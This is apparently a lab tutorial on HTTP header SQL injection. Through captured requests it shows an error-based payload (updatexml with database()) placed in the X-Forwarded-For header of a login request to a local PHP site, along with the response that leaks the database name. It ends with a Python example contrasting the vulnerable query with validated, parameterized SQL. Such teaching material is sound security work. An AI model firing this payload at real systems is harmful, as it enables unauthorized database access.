HTTP header injection

First we set the browser to manual proxy mode, point it at Burp Suite and capture the traffic. Below are the HTTP headers of a login request to the site:

POST /baji/check_login.php HTTP/1.1
Host: 192.168.120.137
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.120.137/baji/login.php
Cookie: PHPSESSID=0minmo2e9at6uucdton5udeg05
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

username=admin&password=admin

Because in this site's code the ip field is passed to the database, we can inject through the X-Forwarded-For field of the HTTP headers. The injected request looks like this:

POST /baji/check_login.php HTTP/1.1
Host: 192.168.120.137
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.120.137/baji/login.php
Cookie: PHPSESSID=0minmo2e9at6uucdton5udeg05
DNT: 1
X-Forwarded-For: 8.8.'and updatexml(1,(concat(0x23,database(),0x23)),3) and'.8
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

username=admin&password=admin

The server's response:

HTTP/1.1 200 OK
Date: Tue, 25 Jun 2019 11:05:32 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
X-Powered-By: PHP/5.4.45
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 46
Connection: close
Content-Type: text/html;charset=utf-8

查询日志出错XPATH syntax error: '#baji#'

The baji after the error is the result we were after.
This is how I understand the principle of HTTP header injection: the precondition is that data from a header field reaches the database, and the injection payload is then placed into that field.
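As an added example (not code from the original post), the flaw the post describes and its fix side by side in Python: an X-Forwarded-For value spliced into a log query, versus the same value validated as an IP address and bound as a parameter. The table name login_log and the sample headers are constructed assumptions, and SQLite stands in for the MySQL server the post targets.

```python
import ipaddress
import sqlite3

# Constructed sample headers (not taken from the original post); the second one
# carries the same kind of payload the post puts into X-Forwarded-For.
BENIGN = {"X-Forwarded-For": "8.8.8.8"}
TAMPERED = {"X-Forwarded-For": "8.8.'and updatexml(1,(concat(0x23,database(),0x23)),3) and'.8"}


def vulnerable_log_sql(headers):
    """Mirror of the flaw in the post: raw header text is concatenated into the SQL
    string, so a quote in the header closes the literal and the rest runs as SQL."""
    ip = headers.get("X-Forwarded-For", "")
    return "INSERT INTO login_log (ip) VALUES ('" + ip + "')"


def client_ip(headers):
    """Return the first X-Forwarded-For hop as a normalised IP string, or None when it
    is not a syntactically valid IPv4/IPv6 address. Which hop to trust depends on the
    proxy chain in front of the application; this example simply takes the first."""
    first = headers.get("X-Forwarded-For", "").split(",")[0].strip()
    try:
        return str(ipaddress.ip_address(first))
    except ValueError:
        return None


def make_db():
    """In-memory SQLite table standing in for the post's login-log table (assumed name)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login_log (ip TEXT NOT NULL)")
    return conn


def safe_log_login(conn, headers):
    """Hardened version: reject anything that is not an IP address, then bind the value
    as a parameter so the database never interprets it as SQL.
    Returns True when a row was written, False when the header was rejected."""
    ip = client_ip(headers)
    if ip is None:
        return False  # an IP field containing quotes or SQL keywords is worth alerting on
    conn.execute("INSERT INTO login_log (ip) VALUES (?)", (ip,))
    conn.commit()
    return True


def logged_ips(conn):
    return [row[0] for row in conn.execute("SELECT ip FROM login_log ORDER BY rowid")]


if __name__ == "__main__":
    print(vulnerable_log_sql(TAMPERED))  # the header text lands inside the query unchanged
    db = make_db()
    print(safe_log_login(db, BENIGN), safe_log_login(db, TAMPERED), logged_ips(db))
```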
